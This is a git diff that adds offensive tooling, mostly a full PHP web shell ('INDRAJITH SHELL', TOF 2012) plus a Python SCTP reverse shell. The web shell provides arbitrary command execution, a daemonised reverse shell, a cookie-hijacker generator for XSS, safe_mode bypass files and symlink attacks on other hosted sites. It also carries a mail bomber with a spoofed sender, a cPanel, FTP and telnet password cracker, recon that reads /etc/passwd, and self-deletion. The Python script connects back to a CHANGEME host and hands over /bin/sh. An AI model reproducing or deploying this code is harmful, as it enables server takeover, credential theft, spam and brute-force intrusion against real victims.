+ } +} + +function postgreyx() +{ + if(function_exists('pg_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function curlx() +{ + if(function_exists('curl_version')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function filesize_x($filex) +{ + $f_size=filesizex(filesize($filex)); + return $f_size; +} + +function rename_ui() +{ + $rf_path=$_GET['rename']; + echo "

Rename



New Name :





"; +} + +function filemanager_bg() +{ + global $sep, $self; + $path=!empty($_GET['path'])?$_GET['path']:getcwd(); + $dirs=array(); + $fils=array(); + if(is_dir($path)) + { + chdir($path); + if($handle=opendir($path)) + { + while(($item=readdir($handle))!==FALSE) + { + if($item=="."){continue;} + if($item==".."){continue;} + if(is_dir($item)) + { + array_push($dirs, $path.$sep.$item); + } + else + { + array_push($fils, $path.$sep.$item); + } + } + } + else + { + alert("Access Denied for this operation"); + } + } + else + { + alert("Directory Not Found!!!"); + } + echo "
+ + + + + + "; + foreach($dirs as $dir) + {//chdir(isset($_GET['path'])) + echo " + + + "; + } + foreach($fils as $fil) + { + echo " + + + "; + } + echo "
NameSizePermissionsActions
".basename($dir)."".filesize_x($dir)."".file_perm($dir)."Delete | Rename
".basename($fil)."".filesize_x($fil)."".file_perm($fil)."Delete | Rename | Edit | Download | Copy
"; +} + +function rename_bg() +{ + if(isset($_GET['old_name']) && isset($_GET['new_name'])) + { + $o_r_path=basename($_GET['old_name']); + $r_path=str_replace($o_r_path, "", $_GET['old_name']); + $r_new_name=$r_path.$_GET['new_name']; + echo $r_new_name; + if(rename($_GET['old_name'], $r_new_name)==FALSE) + { + alert("Access Denied for this action!!!"); + } + else + { + alert("Renamed File Succeessfully"); + } + } +} + +function edit_file() +{ + $path=$_GET['path']; + chdir($path); + $edt_file=$_GET['edit']; + $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file))); + if($e_content) + { + $o_content=$e_content; + } + else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) + { + $fd = fopen($edt_file, "rb"); + if(!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $o_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

View File : ". basename($_GET['edit']) ."


+
+
"; +} +function edit_file_bg() +{ + if(file_exists($_POST['e_file'])) + { + $handle = fopen($_POST['e_file'],"w+"); + if (!handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$_POST['e_content_n']); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); + } + else + { + alert("File Not Found!!!"); + } +} +function delete_file() +{ + $del_file=$_GET['del_fil']; + if(unlink($del_file) != FALSE) + { + alert("Deleted Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function deldirs($d_dir) +{ + $d_files= glob($d_dir.'*', GLOB_MARK); + foreach($d_files as $d_file) + { + if(is_dir($d_file)) + { + deldirs($d_file); + } + else + { + unlink($d_file); + } + } + if(is_dir($d_dir)) + { + if(rmdir($d_dir)) + { + alert("Deleted Directory Successfully"); + } + else + { + alert("Access Denied for this Operation"); + } + } +} +function download() +{ + $d_file=$_GET['down']; + $d_name=basename($d_file); + if (file_exists($d_file)) + { + header('Content-Description: File Transfer'); + header('Content-Type: application/octet-stream'); + header('Content-Disposition: attachment; filename='. basename($d_file)); + header('Content-Transfer-Encoding: binary'); + header('Expires: 0'); + header('Cache-Control: must-revalidate'); + header('Pragma: public'); + header('Content-Length: ' . filesize($d_file)); + ob_clean(); + + readfile($d_file); + exit; + } +} +function code_viewer() +{ + $path=$_GET['path']; + $r_file=$_GET['read']; + $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file))); + if($r_content) + { + $rr_content=$r_content; + } + else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) + { + $fd = fopen($r_file, "rb"); + if (!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $rr_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

Edit File : ". basename($_GET['read']) ."

".$rr_content."
"; +} +function copy_file_ui() +{ + echo "

Copy File



Copy : To : Name :





"; +} +function copy_file_bg() +{ + global $sep; + if(function_exists(copy)) + { + if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name'])) + { + alert("Succeded"); + } + else + { + alert("Access Denied"); + } + } +} +function ch_perm_bg() +{ + if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) + { + if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE) + { + alert("Succeded. Permission Changed!!!"); + } + else + { + alert("Access Denied for This Operation"); + } + } +} +function ch_perm_ui() +{ + $p_file=$_GET['perm']; + echo "

New Permission :

"; + ch_perm_bg(); +} +function mk_file_ui() +{ + chdir($_GET['path']); + echo "


+ + New File Name :


+
+
"; +} +function mk_file_bg() +{ + chdir($_GET['path']); + $c_path=$_GET['path']; + $c_file=$_GET['new_f_name']; + $c_file_contents=$_GET['n_file_content']; + $handle=fopen($c_file, "w"); + if(!$handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$c_file_contents); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); +} +function create_dir() +{ + chdir($_GET['path']); + $new_dir=$_GET['new_dir']; + if(is_writable($_GET['path'])) + { + mkdir($new_dir); + alert("Direcory Created Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function cmd($cmd) +{ + chdir($_GET['path']); + $res=""; + if($_GET['cmdexe']) + { + $cmd=$_GET['cmdexe']; + } + if(function_exists('shell_exec')) + { + $res=shell_exec($cmd); + } + else if(function_exists('exec')) + { + exec($cmd,$res); + $res=join("\n",$res); + } + else if(function_exists('system')) + { + ob_start(); + system($cmd); + $res = ob_get_contents(); + ob_end_clean(); + } + elseif(function_exists('passthru')) + { + ob_start(); + passthru($cmd); + $res=ob_get_contents(); + ob_end_clean(); + } + else if(function_exists('proc_open')) + { + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $handle = proc_open($cmd ,$descriptorspec , $pipes); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fread($pipes[1], 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fgets($pipes[1],512); + } + } + } + pclose($handle); + } + + else if(function_exists('popen')) + { + $handle = popen($cmd , "r"); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= fread($handle, 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= fgets($handle,512); + } + } + } + pclose($handle); + } + + $res=wordwrap(htmlspecialchars($res)); + if($_GET['cmdexe']) + { + echo "

r00t@TOF:~#

".$res."
"; + } + return $res; +} +function upload_file() +{ + chdir($_POST['path']); + if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name'])) + { + alert("Uploaded File Successfully"); + } + else + { + alert("Access Denied!!!"); + } +} + +function reverse_conn_ui() +{ + global $your_ip; + echo "
+

Reverse Shell

+

+ + + + +
Your IP : + PORT : +
PHP Reverse Shell: nc -l -p port
"; +} +function reverse_conn_bg() +{ + global $os; + $option=$_REQUEST['rev_option']; + $ip=$_GET['my_ip']; + $port=$_GET['my_port']; + if($option=="PHP Reverse Shell") + { + echo "

RESULT


"; + function printit ($string) + { + if (!$daemon) + { + print "$string\n"; + } + } + $chunk_size = 1400; + $write_a = null; + $error_a = null; + $shell = 'uname -a; w; id; /bin/sh -i'; + $daemon = 0; + $debug = 0; + if (function_exists('pcntl_fork')) + { + $pid = pcntl_fork(); + if ($pid == -1) + { + printit("ERROR: Can't fork"); + exit(1); + } + if ($pid) + { + exit(0); + } + if (posix_setsid() == -1) + { + printit("Error: Can't setsid()"); + exit(1); + } + $daemon = 1; + } + else + { + printit("WARNING: Failed to daemonise. This is quite common and not fatal."); + } + chdir("/"); + umask(0); + $sock = fsockopen($ip, $port, $errno, $errstr, 30); + if (!$sock) + { + printit("$errstr ($errno)"); + exit(1); + } + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $process = proc_open($shell, $descriptorspec, $pipes); + if (!is_resource($process)) + { + printit("ERROR: Can't spawn shell"); + exit(1); + } + stream_set_blocking($pipes[0], 0); + stream_set_blocking($pipes[1], 0); + stream_set_blocking($pipes[2], 0); + stream_set_blocking($sock, 0); + printit("Successfully opened reverse shell to $ip:$port "); + while (1) + { + if (feof($sock)) + { + printit("ERROR: Shell connection terminated"); + break; + } + if (feof($pipes[1])) + { + printit("ERROR: Shell process terminated"); + break; + } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) + { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) + { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) + { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } + } + fclose($sock); + fclose($pipes[0]); + fclose($pipes[1]); + fclose($pipes[2]); + proc_close($process); + echo "



"; + } +} + +function cookie_jack() +{ + global $cookie_highjacker; + echo "

NOTICE

"; + if(function_exists('fopen') && function_exists('fwrite')) + { + $cook=gzinflate(base64_decode($cookie_highjacker)); + $han_le=fopen("jith_cookie.php", "w+"); + if($han_le) + { + fwrite($han_le, $cook); + echo "Yes... Cookie highjacker is generated.
Name : jith_cookie.php.
Rename it as 404.php or what you like and highjack cookie of your target.
It is useable in XSS
It will make a file configuration.txt in this direcory and save the cookie value in it. :p cheers...



"; + } + else + { + echo "Sorry... Generate COOKIE HIGHJACKER failed



"; + } + } +} + + + +function safe_mode_fuck() +{ + global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php; + $path = chdir($_GET['path']); + chdir($_GET['path']); + switch($_GET['safe_mode']) + { + case "s_php_ini": + $s_file=$s_php_ini; + $s_name="php.ini"; + break; + case "s_htaccess": + $s_name=".htaccess"; + $s_file=$s_htaccess; + break; + case "s_htaccess_pl": + $s_name=".htaccess"; + $s_file=$s_htaccess_pl; + break; + case "s_ini_php": + $s_name="ini.php"; + $s_file=$ini_php; + + } + if(function_exists('fopen')&& function_exists('fwrite')) + { + $s_handle=fopen("$s_name", "a+"); + if($s_handle) + { + fwrite($s_handle, $s_file); + alert("Operation Succeed!!!"); + } + else + { + alert("Access Denied!!!"); + } + fclose($s_handle); + } +} +function safe_mode_fuck_ui() +{ + global $path; + $path=getcwd(); + echo ""; +} +function AccessDenied() +{ + global $path, $forbid_dir; + $path=$_GET['path']; + chdir($path); + if(function_exists('fopen') && function_exists('fwrite')) + { + $forbid=fopen(".htaccess", "wb"); + if($forbid) + { + fwrite($forbid, $forbid_dir); + alert("Opreation Succeeded"); + } + else + { + alert("Access Denied"); + } + fclose($forbid); + } +} + + + +function sym_link() +{ + cmd('rm -rf AKP'); + mkdir('AKP', 0777); + $usrd = array(); + $akps = @implode(@file("/etc/named.conf")); + if(!$file) + { + echo("

Not Found

Sorry, bind file ( /etc/named.conf ) Not Found



"); + } + else + { + $htaccess=@fopen('AKP/.htaccess', 'w'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('AKP/php.ini', 'w'); + fwrite($php_ini_x, $sym_php_ini); + symlink("/", "AKP/root"); + echo ""; + foreach($akps as $akp) + { + if(eregi("zone", $akp)) + { + preg_match_all('#zone "(.*)" #', $akp, $akpzz); + flush(); + if(strlen(trim($akpzz[1][0]))>2) + { + $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); + echo "
DomainsUsersExploit
".$akpzz[1][0]."".$user['name']."SymLink
"; + flush(); + } + } + } + } +} + +function php_ende_ui() +{ + echo "

PHP ENCODE/DECODE

+ +
+ Method : TYPE :



"; +} +function php_ende_bg() +{ + $meth_d=$_POST['typed']; + $typ_d=$_POST['typenc']; + $c_ntent=$_POST['php_content']; + $c_ntent=$c_ntent; + switch($meth_d) + { + case "Encode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "GZUNCOMPRESS": + $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "STR_ROT13": + $res_t=trim(stripslashes($c_ntent.' '),''); + $res_t=base64_encode(str_rot13($res_t)); + $res_t=""; + break; + } + break; + case "Decode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=gzinflate(base64_decode($c_ntent)); + break; + case "GZUNCOMPRESS": + $res_t=gzuncompress(base64_decode($c_ntent)); + break; + case "STR_ROT13": + $res_t=str_rot13(base64_decode($c_ntent)); + break; + } + break; + } + echo "

INDRAJITH SHELL

"; +} + +function massmailer_ui() +{ + echo "

MASS MAILER & MAIL BOMBER

+
Mass Mail
FROM :
TO :
Subject :
Mail Bomber
TO :
Subject :
No. of times
"; +} + +function massmailer_bg() +{ + $from=$_POST['from']; + $to=$_POST['to_mail']; + $subject=$_POST['subject_mail']; + $message=$_POST['mail_content']; + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING



Successfully Mails Send... :p



"; + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Sending... :(



"; + } + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Sending... :(



"; + } +} + +function mailbomb_bg() +{ + $rand=rand(0, 9999999); + $to=$_POST['bomb_to']; + $from="president_$rand@whitewhitehouse.gov"; + $subject=$_POST['bomb_subject']." ID ".$rand; + $times=$_POST['bomb_no']; + $content=$_POST['bmail_content']; + if($times=='') + { + $times=1000; + } + while($times--) + { + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING



Successfully Mails Bombed... :p



"; + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Bombing... :(



"; + } + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Bombing... :(



"; + } + } +} + + +/* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/ +/*------------------------ Credit Goes to Them ---------------------------------*/ +function cpanel_check($host,$user,$pass,$timeout) +{ + set_time_limit(0); + global $cpanel_port; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print "Error : Connection Timeout. Please Check The Target Hostname ."; + exit; + } + else if (curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" and Password \"$pass\"

"; + } + curl_close($ch); +} + +function cpanel_crack() +{ + set_time_limit(0); + global $os; + echo "
"; + $cpanel_port="2082"; + $connect_timeout=5; + if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) + { + ?> +
+
+ + + + + + + + + + + + + + + + + + + +
Target :
User namesPassword
Guess options :
Timeout delay :
+
+
+ Please Enter The Users or Password List
"; + else + { + $userlist=explode("\n",$_POST['username']); + $passlist=explode("\n",$_POST['password']); + + if($_POST['cracktype'] == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") + { + if($cracktype == "telnet") + { + $cpanel_port="23"; + } + else + $cpanel_port="2082"; + foreach ($userlist as $user) + { + $pureuser = trim($user); + echo " [ - ] + Processing user $pureuser ...

"; + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + } + } + + echo "
"; +} + +function get_users() +{ + $userz = array(); + $user = file("/etc/passwd"); + foreach($user as $userx=>$usersz) + { + $userct = explode(":",$usersz); + array_push($userz,$userct[0]); + } + if(!$user) + { + if($opd = opendir("/home/")) + { + while(($file = readdir($opd))!== false) + { + array_push($userz,$file); + } + } + closedir($opd); + } + $userz=implode(', ',$userz); + return $userz; +} + +function exploit_details() +{ + global $os; + echo "
+

Exploit Server Details



+ + + + "; + if(function_exists('apache_get_modules')) + { + echo ""; + } + if($os=='win') + { + echo " + + "; + } + if($os=='nix') + { + echo " + + + + + + + + + "; + $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $uze=array(); + foreach($useful as $uzeful) + { + if(cmd("which $uzeful")) + { + $uze[]=$uzeful; + } + } + echo ""; + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + $uze=array(); + foreach($downloaders as $downloader) + { + if(cmd("which $downloader")) + { + $uze[]=$downloader; + } + } + echo ""; + echo " + "; + } + echo "
+ OS: ".php_uname(s)."
PHP Version : ".phpversion().".
Kernel Release : ".php_uname(r)."
Kernel Version : ".php_uname(v)."
Machine : ".php_uname(m)." +
Server Software : ".$_SERVER['SERVER_SOFTWARE']."
Loaded Apache modules :

"; + echo implode(', ', apache_get_modules()); + echo "
Account Setting : 
".cmd('net accounts')."
User Accounts : 
".cmd('net user')."
Distro : 
".cmd('cat /etc/*-release')."
Distr name : 
".cmd('cat /etc/issue.net')."
GCC : 
".cmd('whereis gcc')."
PERL : 
".cmd('whereis perl')."
PYTHON : 
".cmd('whereis python')."
JAVA : 
".cmd('whereis java')."
APACHE : 
".cmd('whereis apache')."
CPU : 

".cmd('cat /proc/cpuinfo')."
RAM : 
".cmd('free -m')."
User Limits : 

".cmd('ulimit -a')."
Useful : 
";
+              echo implode(', ',$uze);
+              echo "
Downloaders : 
";
+              echo implode(', ',$uze);
+              echo "
Users : 
".wordwrap(get_users()).">
Hosts : 
".cmd('cat /etc/hosts')."




"; +} + +function remote_file_check_ui() +{ + echo "

Remote File Check



+ + +
URL :
Input File's Names in TextArea







"; +} + +function remote_file_check_bg() +{ + set_time_limit(0); + $rtr=array(); + echo "

Scanner Report



"; + $webz=$_POST['rem_web']; + $uri_in=$_POST['tryzzz']; + $r_xuri = trim($uri_in); + $r_xuri=explode("\n", $r_xuri); + foreach($r_xuri as $rty) + { + $urlzzx=$webz.$rty; + if(function_exists('curl_init')) + { + echo ""; + $ch = curl_init($urlzzx); + curl_setopt($ch, CURLOPT_NOBODY, true); + curl_exec($ch); + $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + if($status_code==200) + { + echo ""; + } + else + { + echo ""; + } + } + else + { + echo "cURL Not Found"; + } + } + echo "
Checking : $urlzzx Found....
Not Found...




"; +} + +function remote_download_ui() +{ + echo "

Remote File Download



+ +
URL




"; +} + +function remote_download_bg() +{ + chdir($_GET['path']); + global $os; + $opt=$_GET['type_r_down']; + $rt_ffile=$_GET['rurlfile']; + $name=basename($rt_ffile); + echo "
"; + switch($opt) + { + case "WGET": + if($os!='win') + { + cmd("wget $rt_ffile"); + alert("Downloaded Successfully..."); + } + else + { + alert("Its Windows OS... WGET is not available"); + } + break; + case "cURL": + if(function_exists('curl_init')) + { + $ch = curl_init($rt_ffile); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + $data = curl_exec($ch); + curl_close($ch); + file_put_contents($name, $data); + alert("Download succeeded"); + } + else + { + alert("cURL Not Available"); + } + break; + } + echo "
"; +} + +function hex_encode_ui() +{ + if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) + { + $tyx=$_POST['tyxxx']; + $rezultzz=$_POST['hexinp']; + switch($tyx) + { + case "Encode": + $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER



+ +

+ Input :



"; + break; + case "Decode": + $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER



+ +

+ Input :



"; + break; + } + } + else + { + echo "

HEXADECIMAL ENCODER



+ +

+ Input :



"; + } +} + +function about_us() +{ + echo "

About us



+

AJITH KP & VISHNU NATH KP

 + We are brothersz & dedicated this to my
+ \"Father [Devadasan KP] and Mother[Prakasini AP]\"
My classmates and teachers.
and my buddy SREEJU +
And all friends, teachers in AMSTECK ATRS AND SCIENCE COLLEGE [BCA & BSc] +
Amteck : Dheeraj, Jhelai, Ashwin, Arjun,etc...
+ ToF : Coded32 [who forced me to concentrate in Programming], Null|Void, Al3x,John,etc.
+ Indishell : d@rkwolf,ash3ll & Sen[Who teach me the first lessons]







"; +} + +function killme() +{ + global $self; + echo "

Good Bye Dear

Dear, Good by... :( Hope You Like me...




"; + $me=basename($self); + unlink($me); +} + + +//////////////////////////////// Frond End Calls /////////////////////////////// + +if(isset($_POST['e_file']) && isset($_POST['e_content_n'])) +{ + edit_file_bg(); +} + +else if(isset($_REQUEST['killme'])) +{ + killme(); +} + +else if(isset($_REQUEST['hexenc'])) +{ + hex_encode_ui(); +} + +else if(isset($_REQUEST['about_us'])) +{ + about_us(); +} + +else if(isset($_REQUEST['remotefiledown'])) +{ + remote_download_ui(); +} + +else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path'])) +{ + remote_download_bg(); +} + +else if(isset($_REQUEST['cpanel_crack'])) +{ + cpanel_crack(); +} + +else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz'])) +{ + remote_file_check_bg(); +} + +else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content'])) +{ + php_ende_bg(); +} + +else if(isset($_REQUEST['remote_server_scan'])) +{ + remote_file_check_ui(); +} + +else if(isset($_REQUEST['server_exploit_details'])) +{ + exploit_details(); +} + +else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content'])) +{ + massmailer_bg(); +} + +else if(isset($_REQUEST['mysqlman'])) +{ + mysqlman(); +} + +else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content'])) +{ + mailbomb_bg(); +} + +else if(isset($_REQUEST['cookiejack'])) +{ + cookie_jack(); +} + +else if(isset($_REQUEST['massmailer'])) +{ + massmailer_ui(); +} + +else if(isset($_REQUEST['rename'])) +{ + chdir($_GET['path']); + rename_ui(); +} + +else if(isset($_GET['old_name']) && isset($_GET['new_name'])) +{ + chdir($_GET['path']); + + rename_bg(); + +} +else if(isset($_REQUEST['encodefile'])) +{ + php_ende_ui(); +} +else if(isset($_REQUEST['edit'])) +{ + edit_file(); +} +else if(isset($_REQUEST['down'])) +{ + chdir($_GET['path']); + download(); + +} +else if(isset($_REQUEST['read'])) +{ + chdir($_GET['path']); + code_viewer(); + +} +else if(isset($_REQUEST['perm'])) +{ + chdir($_GET['path']); + ch_perm_ui(); +} +else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm'])) +{ + chdir($_GET['path']); + ch_perm_bg(); +} + +else if(isset($_REQUEST['del_fil'])) +{ + chdir($_GET['path']); + delete_file(); + exit; +} +else if(isset($_REQUEST['phpinfo'])) +{ + chdir($_GET['path']); + ob_clean(); + echo phpinfo(); + exit; +} +else if(isset($_REQUEST['del_dir'])) +{ + chdir($_GET['path']); + $d_dir=$_GET['del_dir']; + deldirs($d_dir); +} +else if(isset($_GET['path']) && isset($_GET['new_file'])) +{ + chdir($_GET['path']); + mk_file_ui(); +} +else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content'])) +{ + mk_file_bg(); +} +else if(isset($_GET['path']) && isset($_GET['new_dir'])) +{ + chdir($_GET['path']); + create_dir(); +} +else if(isset($_GET['path']) && isset($_GET['cmdexe'])) +{ + chdir($_GET['path']); + cmd(); +} +else if(isset($_POST['upload_f']) && isset($_POST['path'])) +{ + upload_file(); +} +else if(isset($_REQUEST['rs'])) +{ + reverse_conn_ui(); +} +else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])) +{ + reverse_conn_bg(); +} +else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])) +{ + chdir($_GET['path']); + safe_mode_fuck_ui(); +} +else if(isset($_GET['path']) && isset($_GET['safe_mode'])) +{ + safe_mode_fuck(); +} +else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) +{ + AccessDenied(); +} + + +else if(isset($_REQUEST['symlink'])) +{ + sym_link(); +} + +else if(isset($_GET['dbz']) && isset($_GET['db_user']) && isset($_GET['db_password']) && isset($_GET['db_port'])) +{ + SQL_Shell_bg(); +} +else if(isset($_GET['path']) && isset($_GET['copy'])) +{ + copy_file_ui(); +} +else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name'])) +{ + copy_file_bg(); +} +else +{ + filemanager_bg(); +} + +////////////////////////////// End Frond End Calls ////////////////////////////// + + +echo "

+
PWD :
+ + + + + + + + +
New File :
+
: New Dir
+
CMD :
+
: Upload File
+

© AJITH KP & VISHNU NATH KP ©
® TOF [2012] ®

" +?> diff --git a/php/reverseshell-poc.txt b/php/reverseshell-poc.txt new file mode 100644 index 0000000..4f8e40b --- /dev/null +++ b/php/reverseshell-poc.txt @@ -0,0 +1,102 @@ + + diff --git a/py/sctp_reverse.py.txt b/py/sctp_reverse.py.txt new file mode 100644 index 0000000..c8b6adb --- /dev/null +++ b/py/sctp_reverse.py.txt @@ -0,0 +1,36 @@ +#!/usr/bin/python +# SCTP Reverse Shell (TCP mode) +# Requires pysctp and sctp to be working +# on the victim box. +# My perfect saturday... Involves # +# infodox - Insecurety Research 2013 +# insecurety.net | @info_dox + +# I probably imported too much things. Who cares. +import socket +import _sctp +import sctp +from sctp import * +import os +import subprocess + +host = '127.0.0.1' # CHANGEME +port = 1337 # CHANGEME + +socket.setdefaulttimeout(60) +s = None +try: + s = sctpsocket_tcp(socket.AF_INET) + s.connect((host,port)) + s.send('g0tsh3ll!\n') + save = [ os.dup(i) for i in range(0,3) ] + os.dup2(s.fileno(),0) + os.dup2(s.fileno(),1) + os.dup2(s.fileno(),2) + shell = subprocess.call(["/bin/sh","-i"]) + [ os.dup2(save[i],i) for i in range(0,3)] + [ os.close(save[i]) for i in range(0,3)] + os.close(s.fileno()) +except Exception: + print "Connection Failed! Is there even a listener?" + pass